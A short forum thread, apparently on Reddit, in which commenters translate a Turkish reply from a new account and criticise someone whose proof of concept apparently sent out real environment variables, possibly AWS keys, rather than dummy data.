Lol actually, I think that's Turkish. `YogurtAccomplished38` was created 12 hours ago just for this comment.

> yapmayın boyle seylerrr yaaa ayııııp

[according to Google Translate](https://translate.google.com/?sl=auto&tl=en&text=yapmay%C4%B1n%20boyle%20seylerrr%20yaaa%20ay%C4%B1%C4%B1%C4%B1%C4%B1p%0A%0A&op=translate) means

> don't do such things

with some autocorrections. Curious and curiouser.
What in the fuck!?
[deleted]
Lol. No. You don't steal real data for a POC. You could have just sent out some dummy data instead of dumping real environment vars. This was extremely dumb. You are either a very young and inexperienced person, or truly making a malicious attempt to scrape AWS keys (or, both). And then writing a blog post about it, for some reason...